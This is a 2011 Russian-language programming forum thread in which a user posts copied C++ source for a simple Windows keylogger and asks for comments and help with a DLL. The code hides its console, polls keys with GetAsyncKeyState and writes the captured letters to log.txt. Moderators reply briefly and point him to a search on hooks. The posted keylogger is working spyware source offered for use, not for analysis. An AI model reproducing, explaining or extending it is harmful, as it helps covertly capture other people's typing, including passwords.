Форум программистов «Весельчак У»
  *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

  • Рекомендуем проверить настройки временной зоны в вашем профиле (страница "Внешний вид форума", пункт "Часовой пояс:").
  • У нас больше нет рассылок. Если вам приходят письма от наших бывших рассылок mail.ru и subscribe.ru, то знайте, что это не мы рассылаем.
   Начало  
Наши сайты
Помощь Поиск Календарь Почта Войти Регистрация  
 
Страниц: [1]   Вниз
  Печать  
Автор Тема: Dev-C++  (Прочитано 6890 раз)
0 Пользователей и 1 Гость смотрят эту тему.
dimiX
Новенький

ru
Offline Offline

« : 06-01-2011 10:50 » 

Хочу написать простой кейлогер(шпион клавы) имею трудности с написанием DLL Скромно так...
Ну кое какие книги и справочники я прочитал. Хочу писать исключительно для консоли. Вот кое что я нашел в сети, только без коментариев в исходнике. Оч. бы хотелось грамотно на писать эту программу. Мне бы помочь с коминтариями к программе, а то я не все пнимаю.
Код:
///////////
#include <iostream>
#include "windows.h"
#include <fstream>
#include <String>
using namespace std;
int main()
{
ofstream File; //я так понимаю создать файл
File.open("log.txt");// открыть его и обозначить
FreeConsole();//невидимаю консоль(ток в процессах)
string log = "";//это сам лог куда все забьется. (переменная типа строковая)
string letter = "";//ммм буквы? )
int num = 0;

while(1)//цикл труе?
{
  for(num=32; num<=90;num++)//цикл фор не понимаю что 32 ну подсознательно понимаю что 90)
  {
    switch(num)
   {
    case 65: letter = "a"; break;
    case 66: letter = "b"; break;
    case 67: letter = "c"; break;
    case 68: letter = "d"; break;
    case 69: letter = "e"; break;
    case 70: letter = "f"; break;
    case 71: letter = "g"; break;
    case 72: letter = "h"; break;
    case 73: letter = "i"; break;
    case 74: letter = "j"; break;
    case 75: letter = "k"; break;
    case 76: letter = "l"; break;
    case 77: letter = "m"; break;
    case 78: letter = "n"; break;
    case 79: letter = "o"; break;
    case 80: letter = "p"; break;
    case 81: letter = "q"; break;
    case 82: letter = "r"; break;
    case 83: letter = "s"; break;
    case 84: letter = "t"; break;
    case 85: letter = "u"; break;
    case 86: letter = "v"; break;
    case 87: letter = "w"; break;
    case 88: letter = "x"; break;
    case 89: letter = "y"; break;
    case 90: letter = "z"; break;
    case 32: letter = " "; break;
}
if(GetAsyncKeyState(num))//?
{
log+=letter;
Sleep(200);
}
if(GetAsyncKeyState(27))
{
File << log;
File.close();
return 0;

}
}
}
}

« Последнее редактирование: 06-01-2011 13:10 от Джон » Записан
Алексей++
глобальный и пушистый
Глобальный модератор

ru
Offline Offline
Сообщений: 13


WWW
« Ответ #1 : 06-01-2011 11:09 » 

dimiX, в борланде разве нет шаблона для проекта-DLL ? Создай новый проект по шаблону и смотри, как визард это сделал


ну и ещё осталось выяснить, как DLL связана с консолью
Записан

Джон
просто
Администратор

de
Offline Offline
Пол: Мужской

« Ответ #2 : 06-01-2011 13:14 » 

Ндааа... грамотно писать на, мне тоже всегда оч. хотелось. Жаль
Записан

Я вам что? Дурак? По выходным и праздникам на работе работать. По выходным и праздникам я работаю дома.
"Just because the language allows you to do something does not mean that it’s the correct thing to do." Trey Nash
"Physics is like sex: sure, it may give some practical results, but that's not why we do it." Richard P. Feynman
"All science is either physics or stamp collecting." Ernest Rutherford
"Wer will, findet Wege, wer nicht will, findet Gründe."
dimiX
Новенький

ru
Offline Offline

« Ответ #3 : 06-01-2011 15:00 » 

ех ну хоть по написанному. Прога после запуска исчезает)) создает и открывает log.txt )) ну чет не пишет туды))) на первых порах мне моно и не грамотно объяснить там где у меня пропущены коментарии. Я не оч. одаренный что бы за просто нагуглить что нить дельнее.)
ЗЫ да на видео с которого я копировал код. там все кулл)) версия Dev-C++ идентичиная. так что не так....)
Записан
Алексей++
глобальный и пушистый
Глобальный модератор

ru
Offline Offline
Сообщений: 13


WWW
« Ответ #4 : 06-01-2011 20:21 » 

dimiX, покажи хоть видео на. Хоть понять на, о чём речь )))
Записан

dimiX
Новенький

ru
Offline Offline

« Ответ #5 : 06-01-2011 21:19 » 

dimiX, покажи хоть видео на. Хоть понять на, о чём речь )))
Вы серьезно? тогда так! у меня склероз! вот и задумал я для частного использования написать прогу ) которая бут заносить в файл вводимый мною текст.
Видео находится здесь ->http://www.youtube.com/watch?v=x4BqJdLJ1y0&feature=related
Зы у мя такой же котяра ) паскалем кличут на )
Записан
Алексей++
глобальный и пушистый
Глобальный модератор

ru
Offline Offline
Сообщений: 13


WWW
« Ответ #6 : 06-01-2011 21:30 » 

воспользуйся поиском, было уже про хуки

https://forum.shelek.ru/index.php?action=search2;params=YWR2YW5jZWR8J3wwfCJ8YnJkfCd8MjYsMTIzLDU0LDM5LDYwLDYxLDYyLDYsMzQsNjgsMTU3LDY5LDcwLDcsOCw3Miw3NCw5LDMzLDEyMSwzNyw3Niw3NywxNTgsOTIsODgsMTAsMTEsNzgsNzksMTIsMTMsMTQsMTUsMTYsNjMsNjQsNjUsNjYsNjcsMTM1LDQwLDQxLDQyLDQzLDQ0LDQ1LDExNCwxMDIsMTA2LDEwNywxMDgsMTA5LDExMSwzNSw1OCw1LDEyOSwxMzYsMTMwLDEzMSwxNTUsMTksMTU5LDMwLDMxLDM2LDE0NCwxNTYsMTQ1LDgzLDg0LDg1LDE0OCwxNDksODcsMTU0LDExMywxMjgsOTMsMywxNTAsMTE2LDExNywxNDcsMTE4LDQ2LDEwNSwxMjUsMTI0LDEyNyw4MSw1OSw4Miw4MCw0OCw1MCw3NSwxMjYsOTAsOTEsOTQsOTUsOTYsOTcsOTgsOTksMTA0fCJ8c2hvd19jb21wbGV0ZXwnfHwifHN1YmplY3Rfb25seXwnfHwifHNvcnR8J3xyZWxldmFuY2V8Inxzb3J0X2RpcnwnfGRlc2N8InxzZWFyY2h8J3zQs9C70L7QsdCw0LvRjNC90YvQuSDRhdGD0Lo=
Записан

dimiX
Новенький

ru
Offline Offline

« Ответ #7 : 07-01-2011 13:27 » 

воспользуйся поиском, было уже про хуки

ок. поду глядеть ) ет моно закрывать. Спс.
Записан
Страниц: [1]   Вверх
  Печать  
 

Powered by SMF 1.1.21 | SMF © 2015, Simple Machines